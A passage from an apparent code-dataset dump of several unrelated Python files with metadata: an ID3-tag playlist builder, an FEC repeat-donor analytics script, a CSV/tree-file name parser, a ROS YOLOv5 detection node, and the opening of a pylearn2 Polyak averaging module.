EasyID3\nfrom musicmodifier.utilities import file_iterator\nfrom musicmodifier.artist import Artist\nfrom musicmodifier.album import Album\nfrom musicmodifier.track import Track\n\n\nclass Playlist:\n _counter = 0\n\n def __init__(self, directory):\n self._name = 'playlist'\n self._directory = directory\n self._all_artists = []\n Playlist._counter += 1\n self._create_playlist()\n\n def _create_playlist(self):\n file_paths = file_iterator(self._directory)\n for path in file_paths:\n self._create_info(path)\n\n def _create_info(self, path):\n audio = EasyID3(path)\n title = ''.join(audio['title'])\n artist = ''.join(audio['artist'])\n album = ''.join(audio['album'])\n track_info = {'title': title, 'artist': artist, 'album': album, 'path': path}\n self._create_artist(track_info)\n\n def _create_artist(self, track_info):\n artist_name = track_info.get('artist')\n artist = self._check_exists(artist_name, self.get_artists())\n if not artist:\n artist_path = track_info.get('path').rsplit('\\\\', 2)[0]\n artist = Artist(artist_name, artist_path)\n self._add_artist(artist)\n self._create_album(track_info, artist)\n\n def _create_album(self, track_info, artist):\n album_name = track_info.get('album')\n album = self._check_exists(album_name, artist.get_albums())\n if not album:\n album_path = track_info.get('path').rsplit('\\\\', 1)[0]\n album = Album(album_name, album_path)\n artist.add_album(album)\n self._create_track(track_info, album)\n\n def _create_track(self, track_info, album):\n track_name = track_info.get('title')\n track = self._check_exists(track_name, album.get_tracks())\n if not track:\n track_path = track_info.get('path')\n track = Track(track_name, track_path)\n album.add_track(track)\n\n def _add_artist(self, artist):\n self._all_artists.append(artist)\n\n def get_name(self):\n return self._name\n\n def set_name(self, name):\n self._name = name\n\n def get_directory(self):\n return self._directory\n\n def get_artists(self):\n return self._all_artists\n\n @staticmethod\n def _check_exists(name, array):\n for item in array:\n if item.get_name() == name:\n return item\n return None\n\n @staticmethod\n def get_counter():\n return Playlist._counter\n", "sub_path": "musicmodifier/playlist.py", "file_name": "playlist.py", "file_ext": "py", "file_size_in_byte": 2541, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "musicmodifier.utilities.file_iterator", "line_number": 19, "usage_type": "call"}, {"api_name": "mutagen.easyid3.EasyID3", "line_number": 24, "usage_type": "call"}, {"api_name": "musicmodifier.artist.Artist", "line_number": 36, "usage_type": "call"}, {"api_name": "musicmodifier.album.Album", "line_number": 45, "usage_type": "call"}, {"api_name": "musicmodifier.track.Track", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "12711027", "text": "import csv, re\nfrom collections import defaultdict\nimport numpy as np\n\ndateformat = re.compile(r'[0-9]{8}\\b')\nzipformat = re.compile(r'[0-9]{5}\\b')\nnameformat = re.compile(r'[A-Za-z,\\s]+')\n\ndef find_repeat_donors(INDIV_Data_Headers):\n\n donor_dict = defaultdict(list)\n recipient_dict = defaultdict(list)\n\n inputdata = 'input/itcont.txt'\n with open(inputdata, newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter='|')\n for index, line in enumerate(csvreader):\n if not check_record_legal(line, INDIV_Data_Headers):\n print('Line {} in {} is invalid.'.format(index+1, inputdata))\n else:\n CmetId, Name, ZipCode, TransactionDate, TransactionAmount, OtherID = extract_fields(line, INDIV_Data_Headers)\n # Use the combination to identify a unique donor\n DonorId = re.sub(r',?\\s+', '_', Name) + '_' + ZipCode\n\n TransactionYear = TransactionDate[4:]\n donor_dict[DonorId].append(int(TransactionYear))\n\n # Reference: https://stackoverflow.com/a/39537308/2709595\n target = TransactionYear + '_' + CmetId + '_' + ZipCode\n recipient_dict[target].append(int(TransactionAmount))\n\n repeat_donor_latest_year = {}\n\n for DonorId, years in donor_dict.items():\n if len(years) > 1:\n # Save the latest calendar year only\n repeat_donor_latest_year[DonorId] = str(max(years))\n\n return repeat_donor_latest_year, recipient_dict\n\ndef extract_fields(line, INDIV_Data_Headers):\n\n # Recipient of contribution\n CmetId = line[INDIV_Data_Headers.index('CMTE_ID')]\n # Name of the donor\n Name = line[INDIV_Data_Headers.index('NAME')]\n # Zip code of contributor (use the first five digits/characters)\n ZipCode = line[INDIV_Data_Headers.index('ZIP_CODE')][:5]\n # Date of transaction\n TransactionDate = line[INDIV_Data_Headers.index('TRANSACTION_DT')]\n # Amount of transaction\n TransactionAmount = line[INDIV_Data_Headers.index('TRANSACTION_AMT')]\n # Whether contribution came from a person or an entity\n OtherID = line[INDIV_Data_Headers.index('OTHER_ID')]\n\n return CmetId, Name, ZipCode, TransactionDate, TransactionAmount, OtherID\n\ndef check_record_legal(line, INDIV_Data_Headers):\n \n CmetId, Name, ZipCode, TransactionDate, TransactionAmount, OtherID = extract_fields(line, INDIV_Data_Headers)\n\n if (OtherID is '') and (TransactionDate is not '') and (dateformat.match(TransactionDate)) and (ZipCode is not '') and (zipformat.match(ZipCode)) and (Name is not '') and (nameformat.match(Name)) and (CmetId is not '') and (TransactionAmount is not ''):\n return True\n else:\n return False\n\ndef read_percentile():\n\n with open('input/percentile.txt') as f:\n percentile = f.readline()\n # 1-100\n if 1 <= float(percentile) <= 100:\n return percentile\n else:\n print('The percentile input is invalid.')\n return None\n\ndef calculate_running_percentile(contributions, percentile):\n\n # Reference: https://stackoverflow.com/a/26071170/2709595\n idx = float(percentile) / 100 * (len(contributions) - 1)\n idx = int(idx + 0.5)\n return round(contributions[np.argpartition(contributions, idx)[idx]])\n\ndef main():\n\n # Source: https://classic.fec.gov/finance/disclosure/metadata/indiv_header_file.csv\n INDIV_Data_Headers = 'CMTE_ID,AMNDT_IND,RPT_TP,TRANSACTION_PGI,IMAGE_NUM,TRANSACTION_TP,ENTITY_TP,NAME,CITY,STATE,ZIP_CODE,EMPLOYER,OCCUPATION,TRANSACTION_DT,TRANSACTION_AMT,OTHER_ID,TRAN_ID,FILE_NUM,MEMO_CD,MEMO_TEXT,SUB_ID'.split(',')\n\n repeat_donor_latest_year, recipient_dict = find_repeat_donors(INDIV_Data_Headers)\n percentile = read_percentile()\n\n outputfile = 'output/repeat_donors.txt'\n with open(outputfile, 'w') as output:\n for target, value in recipient_dict.items():\n TransactionYear = target.split('_')[0]\n CmetId = target.split('_')[1]\n ZipCode = target.split('_')[2]\n contributions = []\n TotalAmount = 0\n for index, DonorId in enumerate(list(repeat_donor_latest_year.keys())):\n LatestYear = repeat_donor_latest_year[DonorId]\n if (LatestYear == TransactionYear) and (percentile is not None):\n TotalAmount += value[index]\n contributions.append(TotalAmount)\n nearest_rank_amt = calculate_running_percentile(contributions, percentile)\n result = '|'.join([CmetId, ZipCode, TransactionYear, str(nearest_rank_amt), str(TotalAmount), str(index+1)])\n output.write(result)\n output.write('\\n')\n\nif __name__ == '__main__':\n main()", "sub_path": "src/donation-analytics.py", "file_name": "donation-analytics.py", "file_ext": "py", "file_size_in_byte": 4761, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "re.compile", "line_number": 5, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 6, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 7, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 11, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 12, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 16, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.argpartition", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "69191374", "text": "#! /usr/bin/python\n\nimport argparse\nimport csv\nfrom collections import defaultdict\n\ndef get_args():\n\n #create and argumentparser object('parser') that will hold all info to parse the cmd line\n parser = argparse.ArgumentParser(description = 'This script removes false frequency-code pairs from telemetry data')\n\n #positional arguments\n #number argument to input\n parser.add_argument('csv', help='csv input file')\n parser.add_argument('tree_file', help='input tree file')\n\n #parse the cmd line arguments\n return parser.parse_args()\n\ndef parse_csv():\n # names dictionary: key = frequency, value = list of real names\n names = defaultdict(dict)\n\n # opening and reading tags file\n with open(args.csv, 'r') as chars: \n #create a csv reader object\n reader = csv.reader(chars, delimiter=',')\n\n #skip the header line\n header = next(reader)\n\n # read in file line by line\n for line in reader:\n\n #skip blank lines\n if not line:\n continue\n \n else:\n # need to ask if key exists already\n if line[0] in names:\n # same as appending to a regular list\n names[line[0]].append(line[1])\n else:\n names[line[0]] = []\n names[line[0]].append(line[1])\n\n #check our work\n for name,value in names.items():\n print(name, value)\n \n return names\n\ndef parse_tree(names_dict):\n\n i=1\n # open, read, and parse the telemetry data file\n with open(args.tree_file, 'r') as tree:\n for line in tree:\n\n #skip the header, could make the value an optional input\n if '#NEXUS' in line:\n print(line, end=' ')\n continue\n elif 'Begin' in line:\n print(line, end=' ')\n continue\n elif 'Translate' in line:\n print(line, end=' ')\n continue\n else:\n for value,name in names_dict.items():\n if str(name) in line:\n print(name+',')\n else:\n continue\n\n\ndef main():\n names_dict = parse_csv()\n parse_tree(names_dict)\n\n#get the arguments before calling main\nargs = get_args()\n\n#execute the program by calling main. __ __allow you to call these functions in other scripts and not just through this one\nif __name__ == '__main__':\n main() \n\n\n", "sub_path": "LTPs132/csv-to-matrix.py", "file_name": "csv-to-matrix.py", "file_ext": "py", "file_size_in_byte": 2539, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 22, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "362209741", "text": "#! /home/jyp/.miniconda3/envs/yolo/bin/python\n\nimport argparse\nimport time\nfrom pathlib import Path\nimport rospy\nimport std_msgs.msg\nfrom rospkg import RosPack\nfrom std_msgs.msg import UInt8\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import Polygon, Point32\nfrom yolov5.msg import BoundingBox, BoundingBoxes\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom skimage.transform import resize\n\nimport cv2\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom numpy import random\nimport numpy as np\nfrom models.experimental import attempt_load\nfrom utils.datasets import LoadStreams, LoadImages\nfrom utils.general import check_img_size, check_requirements, check_imshow, non_max_suppression, apply_classifier, \\\n scale_coords, xyxy2xywh, strip_optimizer, set_logging, increment_path\nfrom utils.plots import plot_one_box\nfrom utils.torch_utils import select_device, load_classifier, time_synchronized\nfrom utils.datasets import letterbox\n\n# Deep learning imports\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torch.autograd import Variable\n\nimport os\npackage = RosPack()\npackage_path = package.get_path('yolov5')\n\nclass detectManager:\n def __init__(self):\n # print(\"\\ndetect init\\n\")\n self.weights = rospy.get_param('~weights')\n self.source = rospy.get_param('~source')\n self.view_img = rospy.get_param('~view_img')\n self.save_txt = rospy.get_param('~save_txt')\n self.img_size = rospy.get_param('~img_size')\n self.name = rospy.get_param('~name')\n self.exist_ok = rospy.get_param('~exist_ok')\n self.project = rospy.get_param('~project')\n self.device = str(rospy.get_param('~device'))\n\n self.augment = rospy.get_param('~augment')\n self.iou_thres = rospy.get_param('~iou_thres')\n if(rospy.get_param('~classes') == 'None'):\n self.classes = None\n else:\n self.classes = rospy.get_param('~classes')\n self.agnostic_nms = rospy.get_param('~agnostic_nms')\n self.conf_thres = rospy.get_param('~conf_thres')\n self.save_conf = rospy.get_param('~save_conf')\n\n # Initialize width and height\n self.h = 0\n self.w = 0\n\n # Load other parameters\n self.gpu_id = rospy.get_param('~gpu_id', 0)\n self.network_img_size = rospy.get_param('~img_size', 416)\n self.publish_image = rospy.get_param('~publish_image')\n\n self.image_topic = rospy.get_param('~image_topic')\n\n # Load CvBridge\n self.bridge = CvBridge()\n # Load publisher topics\n self.detected_objects_topic = rospy.get_param('~detected_objects_topic')\n self.published_image_topic = rospy.get_param('~detections_image_topic')\n\n # Define subscribers\n self.image_sub = rospy.Subscriber(\n self.image_topic, Image, self.image_callback, queue_size=1, buff_size=2**24)\n\n # Define publishers\n self.pub_ = rospy.Publisher(\n self.detected_objects_topic, BoundingBoxes, queue_size=10)\n self.pub_viz_ = rospy.Publisher(\n self.published_image_topic, Image, queue_size=10)\n rospy.loginfo(\"Launched node for object detection\")\n self.path = package_path\n # print(\"\\nbehind spin\\n\")\n # Spin\n rospy.spin()\n\n def image_callback(self, data):\n # Convert the image to OpenCV\n try:\n self.cv_image = self.bridge.imgmsg_to_cv2(data, \"rgb8\")\n except CvBridgeError as e:\n print(e) \n \n #a = input()\n # Initialize detection results\n detection_results = BoundingBoxes()\n detection_results.header = data.header\n detection_results.image_header = data.header\n\n # Configure input\n input_img = self.imagePreProcessing(self.cv_image)\n input_img = Variable(input_img.type(torch.FloatTensor))\n\n # Get detections from network\n with torch.no_grad():\n detections = self.detect(self.cv_image, data)\n # detections = non_max_suppression(\n # detections, 80, self.confidence_th, self.nms_th)\n return 0\n\n\n def imagePreProcessing(self, img):\n # Extract image and shape\n img = np.copy(img)\n img = img.astype(float)\n height, width, channels = img.shape\n\n if (height != self.h) or (width != self.w):\n self.h = height\n self.w = width\n\n # Determine image to be used\n self.padded_image = np.zeros(\n (max(self.h, self.w), max(self.h, self.w), channels)).astype(float)\n\n # Add padding\n if (self.w > self.h):\n self.padded_image[(self.w-self.h)//2: self.h +\n (self.w-self.h)//2, :, :] = img\n else:\n self.padded_image[:, (self.h-self.w) //\n 2: self.w + (self.h-self.w)//2, :] = img\n\n # Resize and normalize\n input_img = resize(\n self.padded_image, (self.network_img_size, self.network_img_size, 3))/255.\n\n # Channels-first\n input_img = np.transpose(input_img, (2, 0, 1))\n\n # As pytorch tensor\n input_img = torch.from_numpy(input_img).float()\n input_img = input_img[None]\n\n return input_img\n\n def visualizeAndPublish(self, output, imgIn):\n # Copy image and visualize\n imgOut = imgIn.copy()\n font = cv2.FONT_HERSHEY_SIMPLEX\n fontScale = 0.8\n thickness = 2\n for index in range(len(output.bounding_boxes)):\n label = output.bounding_boxes[index].Class\n x_p1 = output.bounding_boxes[index].xmin\n y_p1 = output.bounding_boxes[index].ymin\n x_p3 = output.bounding_boxes[index].xmax\n y_p3 = output.bounding_boxes[index].ymax\n confidence = output.bounding_boxes[index].probability\n\n # Find class color\n if label in self.classes_colors.keys():\n color = self.classes_colors[label]\n else:\n # Generate a new color if first time seen this label\n color = np.random.randint(0, 255, 3)\n self.classes_colors[label] = color\n\n imgOut = np.array(imgOut)\n # cv2.rectangle(imgOut, (int(x_p1), int(y_p1)), (int(x_p3), int(y_p3)), (color[0],color[1],color[2]),thickness)\n cv2.rectangle(imgOut, (int(x_p1), int(y_p1)), (int(x_p3), int(\n y_p3)), (int(color[0]), int(color[1]), int(color[2])), thickness)\n text = ('{:s}: {:.3f}').format(label, confidence)\n cv2.putText(imgOut, text, (int(x_p1), int(y_p1+20)), font,\n fontScale, (255, 255, 255), thickness, cv2.LINE_AA)\n\n # Publish visualization image\n image_msg = self.bridge.cv2_to_imgmsg(imgOut, \"rgb8\")\n self.pub_viz_.publish(image_msg)\n\n\n def detect(self, opencv_img, data, save_img=False):\n self.weights = os.path.join(package_path, 'yolov5/weights', self.weights)\n self.source = os.path.join(package_path,'yolov5', self.source)\n # print(self.weights)\n source, weights, view_img, save_txt, imgsz = self.source, self.weights, self.view_img, self.save_txt, self.img_size\n webcam = source.isnumeric() or source.endswith('.txt') or source.lower().startswith(\n ('rtsp://', 'rtmp://', 'http://'))\n self.project = os.path.join(package_path,'yolov5', self.project)\n # Directories\n save_dir = Path(increment_path(Path(self.project) / self.name,\n exist_ok=self.exist_ok)) # increment run\n \n (save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True,\n exist_ok=True) # make dir\n\n # Initialize\n set_logging()\n device = select_device(self.device)\n half = device.type != 'cpu' # half precision only supported on CUDA\n\n # print(os.getcwd())\n # Load model\n model = attempt_load(weights, map_location=device) # load FP32 model\n stride = int(model.stride.max()) # model stride\n imgsz = check_img_size(imgsz, s=stride) # check img_size\n if half:\n model.half() # to FP16\n\n # Second-stage classifier\n classify = False\n if classify:\n modelc = load_classifier(name='resnet101', n=2) # initialize\n modelc.load_state_dict(torch.load(\n 'weights/resnet101.pt', map_location=device)['model']).to(device).eval()\n\n # Set Dataloader\n vid_path, vid_writer = None, None\n if webcam:\n view_img = check_imshow()\n cudnn.benchmark = True # set True to speed up constant image size inference\n dataset = LoadStreams(source, img_size=imgsz, stride=stride)\n else:\n #save_img = True\n save_img = False\n dataset = LoadImages(source, img_size=imgsz, stride=stride)\n\n # Get names and colors\n names = model.module.names if hasattr(model, 'module') else model.names\n colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]\n\n # Run inference\n if device.type != 'cpu':\n model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(\n next(model.parameters()))) # run once\n t0 = time.time()\n\n # path = r\"/workspace/yolov5/data/images/bus.jpg\"\n vid_cap = None\n #im0s = cv2.imread(path)\n im0s = opencv_img\n img = letterbox(im0s, 640, stride=stride)[0]\n # Convert\n img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416\n img = np.ascontiguousarray(img)\n # img = cv2.imread(\"\")\n\n img = torch.from_numpy(img).to(device)\n img = img.half() if half else img.float() # uint8 to fp16/32\n img /= 255.0 # 0 - 255 to 0.0 - 1.0\n if img.ndimension() == 3:\n img = img.unsqueeze(0)\n # Inference\n t1 = time_synchronized()\n # print(img.shape)\n # print(img)\n # print(self.conf_thres)\n # print(self.iou_thres)\n # print(self.classes)\n # print(self.agnostic_nms)\n # print(\"\\nhaha: 02394857\\n\")\n\n pred = model(img, augment=False)[0]\n # Apply NMS\n pred = non_max_suppression(\n pred, self.conf_thres, self.iou_thres, classes=self.classes, agnostic=self.agnostic_nms)\n t2 = time_synchronized()\n # Apply Classifier\n if classify:\n pred = apply_classifier(pred, modelc, img, im0s)\n # Process detections\n detection_results = BoundingBoxes()\n detection_results.header = data.header\n detection_results.image_header = data.header\n\n for i, det in enumerate(pred): # detections per image\n\n im0 = im0s\n p = self.path\n # if webcam: # batch_size >= 1\n # p, s, im0, frame = path[i], '%g: ' % i, im0s[i].copy(), dataset.count\n # else:\n # p, s, im0, frame = path, '', im0s, getattr(dataset, 'frame', 0)\n # p = Path(p) # to Path\n #save_path = str(self.save_dir + \"/img.jpg\") # img.jpg\n #txt_path = str(self.save_dir + \"/labels/label\")\n s = ''\n s += '%gx%g ' % img.shape[2:] # print string\n gn = torch.tensor(im0.shape)[[1, 0, 1, 0]] # normalization gain whwh\n if len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(\n img.shape[2:], det[:, :4], im0.shape).round()\n # Print results\n for c in det[:, -1].unique():\n n = (det[:, -1] == c).sum() # detections per class\n s += f\"{n} {names[int(c)]}{'s' * (n > 1)}, \" # add to string\n \n xmin, ymin, xmax, ymax, conf, det_class = det[0]\n detection_msg = BoundingBox()\n detection_msg.xmin = int(xmin.item())\n detection_msg.xmax = int(xmax.item())\n detection_msg.ymin = int(ymin.item())\n detection_msg.ymax = int(ymax.item())\n detection_msg.probability = conf.item()\n detection_msg.Class = names[int(det_class.item())]\n detection_results.bounding_boxes.append(detection_msg)\n\n # Write results\n for *xyxy, conf, cls in reversed(det):\n if save_txt: # Write to file\n xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) /\n gn).view(-1).tolist() # normalized xywh\n # label format\n line = (cls, *xywh, conf) if self.save_conf else (cls, *xywh)\n with open(txt_path + '.txt', 'a') as f:\n f.write(('%g ' * len(line)).rstrip() % line + '\\n')\n if save_img or view_img: # Add bbox to image\n label = f'{names[int(cls)]} {conf:.2f}'\n plot_one_box(xyxy, im0, label=label,\n color=colors[int(cls)], line_thickness=3)\n # Print time (inference + NMS)\n print(f'{s}Done. ({t2 - t1:.3f}s)')\n # Stream results\n if view_img:\n cv2.imshow(str(p), im0)\n cv2.waitKey(1) # 1 millisecond\n # Save results (image with detections)\n if save_img:\n if dataset.mode == 'image':\n cv2.imwrite(save_path, im0)\n else: # 'video'\n if vid_path != save_path: # new video\n vid_path = save_path\n if isinstance(vid_writer, cv2.VideoWriter):\n vid_writer.release() # release previous video writer\n fourcc = 'mp4v' # output video codec\n fps = vid_cap.get(cv2.CAP_PROP_FPS)\n w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n vid_writer = cv2.VideoWriter(\n save_path, cv2.VideoWriter_fourcc(*fourcc), fps, (w, h))\n vid_writer.write(im0)\n self.pub_.publish(detection_results)\n #if save_txt or save_img:\n # s = f\"\\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}\" if save_txt else ''\n #print(f\"Results saved to {save_dir}{s}\")\n\n print(f'Done. ({time.time() - t0:.3f}s)')\n\n\nif __name__ == '__main__':\n rospy.init_node(\"detector_manager_node\")\n rospy.loginfo(\"start detect node\")\n dm = detectManager()\n", "sub_path": "src/yolov5/yolov5/detect.py", "file_name": "detect.py", "file_ext": "py", "file_size_in_byte": 14788, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "rospkg.RosPack", "line_number": 36, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 42, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 43, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 44, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 45, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 46, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 47, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 48, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 49, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 50, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 52, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 53, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 54, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 57, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 58, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 59, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 60, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 67, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 68, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 69, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 71, "usage_type": "call"}, {"api_name": "cv_bridge.CvBridge", "line_number": 74, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 76, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 77, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 80, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 81, "usage_type": "argument"}, {"api_name": "rospy.Publisher", "line_number": 84, "usage_type": "call"}, {"api_name": "yolov5.msg.BoundingBoxes", "line_number": 85, "usage_type": "argument"}, {"api_name": "rospy.Publisher", "line_number": 86, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 87, "usage_type": "argument"}, {"api_name": "rospy.loginfo", "line_number": 88, "usage_type": "call"}, {"api_name": "rospy.spin", "line_number": 92, "usage_type": "call"}, {"api_name": "cv_bridge.CvBridgeError", "line_number": 98, "usage_type": "name"}, {"api_name": "yolov5.msg.BoundingBoxes", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 109, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 130, "usage_type": "call"}, {"api_name": "skimage.transform.resize", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 149, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 157, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 173, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 176, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 178, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 181, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 182, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 190, "usage_type": "call"}, {"api_name": "os.path", "line_number": 190, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 191, "usage_type": "call"}, {"api_name": "os.path", "line_number": 191, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 198, "usage_type": "call"}, {"api_name": "utils.general.increment_path", "line_number": 198, "usage_type": "call"}, {"api_name": "utils.general.set_logging", "line_number": 205, "usage_type": "call"}, {"api_name": "utils.torch_utils.select_device", "line_number": 206, "usage_type": "call"}, {"api_name": "models.experimental.attempt_load", "line_number": 211, "usage_type": "call"}, {"api_name": "utils.general.check_img_size", "line_number": 213, "usage_type": "call"}, {"api_name": "utils.torch_utils.load_classifier", "line_number": 220, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 221, "usage_type": "call"}, {"api_name": "utils.general.check_imshow", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 228, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 228, "usage_type": "name"}, {"api_name": "utils.datasets.LoadStreams", "line_number": 229, "usage_type": "call"}, {"api_name": "utils.datasets.LoadImages", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 237, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 241, "usage_type": "call"}, {"api_name": "time.time", "line_number": 243, "usage_type": "call"}, {"api_name": "utils.datasets.letterbox", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 252, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 255, "usage_type": "call"}, {"api_name": "utils.torch_utils.time_synchronized", "line_number": 261, "usage_type": "call"}, {"api_name": "utils.general.non_max_suppression", "line_number": 272, "usage_type": "call"}, {"api_name": "utils.torch_utils.time_synchronized", "line_number": 274, "usage_type": "call"}, {"api_name": "utils.general.apply_classifier", "line_number": 277, "usage_type": "call"}, {"api_name": "yolov5.msg.BoundingBoxes", "line_number": 279, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 296, "usage_type": "call"}, {"api_name": "utils.general.scale_coords", "line_number": 299, "usage_type": "call"}, {"api_name": "yolov5.msg.BoundingBox", "line_number": 307, "usage_type": "call"}, {"api_name": "utils.general.xyxy2xywh", "line_number": 319, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 319, "usage_type": "call"}, {"api_name": "utils.plots.plot_one_box", "line_number": 327, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 333, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 334, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 338, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 342, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 345, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 346, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 347, "usage_type": "attribute"}, {"api_name": "cv2.VideoWriter", "line_number": 348, "usage_type": "call"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 349, "usage_type": "call"}, {"api_name": "time.time", "line_number": 356, "usage_type": "call"}, {"api_name": "rospy.init_node", "line_number": 360, "usage_type": "call"}, {"api_name": "rospy.loginfo", "line_number": 361, "usage_type": "call"}]} +{"seq_id": "428430117", "text": "from __future__ import division\n\"\"\"\nStochastic Gradient Descent and related functionality such as\nlearning rate adaptation, momentum, and Polyak averaging.\n\nModified from pylearn2.training_algorithms.sgd by Guillaume Desjardins,\nto match:\n\n\"Learning Feature Hierarchies with Centered Deep Boltzmann Machines\",\nGregoire Montavon, Klaus-Robert Muller.\n\"\"\"\n__authors__ = \"Ian Goodfellow\"\n__copyright__ = \"Copyright 2010-2012, Universite de Montreal\"\n__credits__ = [\"Ian Goodfellow, David Warde-Farley\"]\n__license__ = \"3-clause BSD\"\n__maintainer__ = \"Ian Goodfellow, David Warde-Farley\"\n__email__ = \"goodfeli@iro\"\nfrom theano import function\nfrom pylearn2.utils import sharedX\nfrom pylearn2.training_callbacks.training_callback import TrainingCallback\nfrom pylearn2.utils import serial\n\nclass PolyakAveraging(TrainingCallback):\n \"\"\"\n See \"A Tutorial on Stochastic Approximation Algorithms\n for Training Restricted Boltzmann Machines and\n Deep Belief Nets\" by Kevin Swersky et al\n\n Notes: this is usually used with a fixed, rather than\n annealed learning rate.\n It may be used in conjunction with momentum.\n\n This functionality is still a work in progress. Currently,\n your model needs to implement \"add_polyak_channels\" to\n use it.\n\n The problem is that Polyak averaging shouldn't modify\n the model parameters. It should keep a second copy\n that it averages in the background. This second copy\n doesn't get to come back in and affect the learning process\n though.\n\n (IG tried having the second copy get pushed back into\n the model once per epoch, but this turned out to be\n harmful, at least in limited tests)\n\n So we need a cleaner interface for monitoring the\n averaged copy of the parameters, and we need to make\n sure the saved model at the end uses the averaged\n 